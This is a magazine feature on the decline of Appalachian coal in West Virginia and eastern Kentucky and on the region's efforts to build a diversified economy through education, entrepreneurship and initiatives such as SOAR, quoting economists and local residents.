Throughout 2016, the decline of coal has been used as a political football, a metaphor for the damage done by liberal, environmentalist regulation to the working class. Hillary Clinton, who said that her energy plans would “put a lot of coal miners and coal companies out of business,” lost enormously across Appalachia. Donald Trump, both during the campaign and since his victory, has promised to save the coal industry with energy reform that rescinds environmental efforts like Obama’s Climate Action Plan; he’s also spoken of abolishing the Environmental Protection Agency, and there is concern he will ignore international climate agreements. In West Virginia, the newly elected Democratic governor, Trump-esque billionaire coal baron Jim Justice, is noncommittal on the existence of climate change and has pledged to “promote new uses for coal,” incentivize power plants to use only West Virginia coal, and bring back coal jobs. But economics might be a stronger force than rhetoric: even with the prospect of supportive federal and state administrations, many power company executives, including ones in Appalachia, are declaring that coal is simply too cost-ineffective, and are continuing with plans to shut down their coal-fired power plants.

But while coal country happens to be in the political spotlight today, the region is not unique in its susceptibility to the problems in which it finds itself. The 20th century has seen countless regional economies built on extractive and polluting industries that have been decimated by technological advancement and globalization: manufacturing in the Rust Belt, the auto industry in Detroit, the timber industry in the Pacific Northwest. As the coal industry dies—and make no mistake, it is dying—some in Appalachia are still clinging to a past that can’t save them, but many others are trying to find a way to create a new economy, focused on a future where the communities of Appalachia are more self-sustaining. In driving through the region this fall, we discovered that the lessons they’re learning and sharing will be vital as more and more industries—and the economies they support—fall victim to the same forces that are ending coal. The innovative web of entrepreneurs, community organizations, and government programs in Appalachia can serve as the model for the transition to a new economy for any community.

Coal keeps the lights on—until it doesn’t

In places like West Virginia, where my colleague Elaine McMillion Sheldon and I are from, coal is a foundational part of the cultural identity. So much so that on a rainy day this August, when we drove past a modest lot of used cars on West Virginia’s Route 19, the sign that loomed above it seemed completely normal: King Coal Pre-Owned Super Store. It might have held a certain significance now, as we crisscrossed West Virginia and eastern Kentucky, but we have driven by this sign and others like it dozens of times in our lives. To grow up in the heart of Appalachia is to internalize this narrative, whether your family has worked in the mines for generations (as in Elaine’s case) or it hasn’t (as in mine). Coal is king. Friends of coal. Coal keeps the lights on—until it doesn’t.


The coal economy has been many things in and to Appalachia—pride, livelihood, environmental villain, political juggernaut—but it has never been particularly resilient. While U.S. coal production was on an overall increase from 1949 to the mid-2000s, that rise was peppered with spikes and plateaus, as well as fluctuations in the labor force. In the mid-20th century, mechanization and consolidation in the coal industry sent jobs plummeting. West Virginian mining jobs dropped from 125,000 to 65,000 between 1947 and 1954, eventually hitting 41,000 in 1968, which was at the time a 65-year low. (This era also marked a large regional migration to northern industrial cities, often referred to as the “Hillbilly Highway.” Between 1940 and 1960, 7 million Appalachians left.) Eastern Kentucky’s production experienced sharp downward spikes in the late 1950s and ’80s, West Virginia in the early ’90s and early 2000s. Coal has always brought booms as well as busts.

There is much evidence to suggest that Appalachia’s last boom has come and gone. Even without the rise of renewables, the bottom has fallen out of the coal market. The driving force in the decline of U.S. coal production is the booming shale gas market. Last year, for the first time, natural gas surpassed coal as the country’s largest source of net electricity generation. And coal from the western United States—where coal is generally cheaper and mined less labor-intensively in surface mines—is supplanting Appalachian coal. (The country’s biggest coal producer today is, by far, Wyoming.) Global exports, which account for an estimated 27% of West Virginia’s coal production, are also down.

Coal production here has been in overall decline since 1990, dropping by 45% between 2000 and 2015; in eastern Kentucky, production has plummeted by 80%. West Virginia, Appalachia’s biggest coal producer, produced 168 million short tons in 2008. If this year’s output continues at pace, that number is expected to hit 68 million, the state’s lowest annual output in a century. Long-term forecasts are similarly low: the West Virginia University Bureau of Business and Economic Research (BBER) projects state coal production to fall to fewer than 67 million short tons by 2036. (Back in 2009, Charleston Gazette-Mail writer Ken Ward Jr., long an important voice in this conversation, pointed out that the Appalachian Basin could hit “peak coal”—the point of maximum production, after which it’s all downhill—as early as 2020.) Between 2000 and 2015, Appalachia lost more than 9,300 coal jobs, and major mining companies like Alpha Natural Resources have filed for bankruptcy, leaving behind devastated livelihoods and devastated earth. WVU’s BBER sees only 0.5% job growth in the state’s natural resources and mining sector (with all of those jobs coming in natural gas) over the next five years; it expects coal industry employment to contract by an average annual rate of 2% through 2021.

A new economy, and a new identity

From the outside, coal’s dethroning by cheaper, cleaner alternatives may seem inarguable. But the reason for coal’s demise has been something of a debate, especially to those who believe that its only real problem is the Obama administration and a liberal, Environmental Protection Agency-led war on coal. (In fact, while compliance with the carbon-emissions-reducing Clean Power Plan contributes to decreased coal production, the U.S. EIA found that Appalachia would actually see the country’s smallest CPP-attributable drop.) So when Elaine and I set out to document the efforts underway in Appalachia’s transitioning economy, we knew that we could not presuppose that everyone believed such a transition was happening. The first question had to be not how is Appalachia transitioning, but is it?

On our travels through West Virginia and eastern Kentucky, we heard just one person refer in earnest to a war on coal. We heard many others—economists, community development leaders, small-business owners, ex-miners—say that the moment of transition had arrived. That there was no going back. That coal might still be mined, some miners might keep their jobs, but the industry would never again be what it once was. To say good-bye to coal—even if just to say good-bye to its halcyon days—is a profound spiritual and emotional decision for a people who have watched their family members work, suffer, and die underground, who have loved and taken deep pride in the community coal created. One person invoked the stages of grief, several others mentioned post-traumatic stress disorder. It’s hard to overstate—and perhaps, to outsiders, hard to explain at all—the mental shift that this economic change represents, and the reevaluation of identity it prompts.

It creates an opportunity, but it also creates a vacuum. For decades in West Virginia, for instance, the economy has been dominated by largely absentee companies that have, in essence, extracted twice: first resources, then profit. Relative to the wealth of coal moguls like Don Blankenship, the disgraced Massey Energy CEO (currently serving a one-year sentence for conspiring to violate federal mine safety standards in the Upper Big Branch disaster that killed 29 miners) and governor-elect Justice, little of coal’s prosperity has touched the people whose land it came from or who toiled to get it out, save for the new vehicles and homes bought with coal salaries and so easily repossessed after layoffs came to town. One possible outcome of an imbalance like this is the sense that one is living in a feudal state—that, when those lords leave, others need to come in to take their places. Much of the work being done by economic development groups around Appalachia starts with reversing this idea and helping people see the possibility, and opportunity, within themselves and their home.

Reinventing The Rural Economy

But this is less a story about coal’s decline than it is about what the people left in the wake of that descent can do afterward to strengthen economic muscles that atrophied while coal grew more and more powerful. The decline of coal brings unprecedented opportunities to build lasting, meaningful economies. Here, in a place largely without the urban centers that traditionally attract the likes of Google and Uber, it is a chance to find new ways to utilize potential, to reinvent the rural economy into something multifaceted and resilient.

All around Appalachia, people are trying to harness that possibility and realize that opportunity for as many people as possible, by trying to figure out how to both capitalize on their strengths in new areas and improve existing economic sectors (and how to do both fast). In some places, these efforts have the flash of millennial innovation (life sciences businesses, tech startups), and in others (auto shops, aerospace mechanics) they don’t. They involve new ideas and existing infrastructures, young people who are just starting their careers, and people who have had to figure out, in the middle of their lives, how to start over.

These efforts are encouraging—as are the modest drops in forecasted unemployment rates in both West Virginia and Kentucky, led by the construction, professional, and service sectors—but they exist within a context of systemic, pervasive challenges. The decline of coal has affected not just those who work in the industry, though they are undoubtedly hit the hardest, but also those who work in transportation, as metal fabricators, even at shopping malls. Entrepreneurship is a major tenet of a diversified Appalachian economy, but Appalachian entrepreneurs often lack access to capital; there is not a single venture capital firm in the state of West Virginia, which Forbes has declared the worst state in the country in which to do business. An average of 29% of the population of eastern Kentucky is below the poverty line; in West Virginia, it’s 18%. West Virginia had the country’s highest rate of drug-overdose deaths in 2014, and it’s losing population faster than any state in the country. John Deskins, director of the WVU BBER, says the state’s main economic challenge is human capital: a healthy, skilled workforce.

The major barrier to a skilled workforce, of course, is lack of education. Coal provided high-paying jobs for those with relatively little education, and now that workforce is often ill-prepared for other markets, but they’re not alone. Only 19% of the population of West Virginia and an average of 12% of the population of eastern Kentucky have bachelor’s degrees or higher. (Projections suggest that, in West Virginia alone, 52% of jobs will require post-secondary degrees by 2020.)

Here, there is progress: WVU and the West Virginia Higher Education Policy Commission are working to improve graduation rates with student-centered programs that target rural counties with low college attendance, offer on-campus support, and support entrepreneurialism, and last year the state had a record number of two- and four-year graduates. Almost every economic-development initiative we saw in West Virginia and eastern Kentucky came back, somehow, to education, even if just a workshop, training program, or retraining program. (Many involved financial assistance.) Progress in education can be slow to pay off, especially considering the length of a bachelor’s degree, but it must be prioritized, says Chris Bollinger, director of the University of Kentucky Center of Business and Economic Research. Otherwise, history stands to repeat itself yet again: “A generation from now, we’re going to be in the same place,” he said. “You can go back to Night Comes to the Cumberlands“—Harry Caudill’s seminal 1963 book on the region’s troubled and depressed history—”and it could have been written yesterday.”

In Kentucky, a bipartisan initiative called SOAR (Shaping our Appalachian Region) united longtime Republican Congressman Hal Rogers and Republican Governor Matt Bevin in an “honest dialogue” about a future beyond eastern Kentucky’s struggling coal economy, with events and seminars that work toward job creation and innovation in what it calls a “landscape-changing enterprise.” It’s not an understatement: By dint of its existence, SOAR has given state actors like the Mountain Association for Community Economic Development (MACED) a new freedom. When we sat down at the 40-year-old advocacy group’s office in Berea, Kentucky, its director, Peter Hille, pointed to a row of books on a shelf behind him, which contained a 1986 MACED coal study that, among other things, challenged the longevity of coal and its economic impact on the state. “There’s stuff in there that was not popular to say,” he says. “But now you’ve got Rogers, the Republican chair of the appropriations committee, saying essentially, ‘Coal’s not coming back and we need to do something different.'”

That this kind of dialogue is lacking in West Virginia leaves people like James Van Nostrand, director of the WVU College of Law’s Center for Energy and Sustainable Development, still feeling hamstrung in his ability to act on what he considers economics-driven issues, not political ones. “It makes it harder to have those conversations about where we need to go when some are saying, ‘We don’t need to go anywhere, we just need to get the EPA off our back,'” Van Nostrand said. “It’s a complete copout in terms of the leadership we need to start addressing these issues.”

An Old Story With A New Ending

Perhaps some solace is that many people we met, from former coal miners to independent artists, weren’t waiting—they were addressing their issues themselves, as best they could. In Beckley, West Virginia, a former miner opens an auto shop. In Charleston, a man starts a hotdog stand as part of a downtown revitalization. In Berea, Kentucky, an artist sells her friends’ work in her art and coffee house. Nearby, a laid-off miner is trained for a new job: retrofitting houses to be more energy efficient. It isn’t that simple, of course—as Hille put it, we also need an industrial-sized solution, because we have an industrial-sized problem—but Deskins and Bollinger agree that these small independent actors are a big part of a diverse economy’s success. When citizens are given the resources they need to open a business or retrain for a new job, Bollinger says, “people making decisions about the economic conditions around them generally make good decisions.”

In driving through West Virginia and eastern Kentucky, we found five places being shaped by these kinds of decisions—and the new economies that can spring up around them. They do not represent a comprehensive overview of the many efforts like them, nor are they the only way forward. If there is one common thread of the many conversations we had in the region, it’s that there can never be just one way again.

In Berea, Hille spoke about a project he did years ago, visiting rural communities around the country with the Kellogg Foundation. Everywhere he went, someone would tell him what made their hometown different. This is what’s happening here, they would say: Their economy wasn’t working anymore, their children were leaving, their businesses were boarding up, their schools were closing, and they didn’t know what to do. They might have been talking about cotton in the South, timber in the Pacific Northwest, or sugar cane in Hawaii. When you looked past the details, it was the same story everywhere. Now, though, there might be a happier ending.

Next Stop: Morgantown, West Virginia: Can West Virginia University Jump-Start A New Economy Based On Innovation—Not Coal?

Courtney Balestier is a James Beard-nominated writer whose work has appeared in the New Yorker online, the New York Times, the Oxford American, and elsewhere. She writes often about Appalachia. 

Elaine McMillion Sheldon is a Peabody award-winning documentary filmmaker and visual journalist. She’s currently in production on a feature-length documentary about the lives of several young men escaping the opioid epidemic in Appalachia.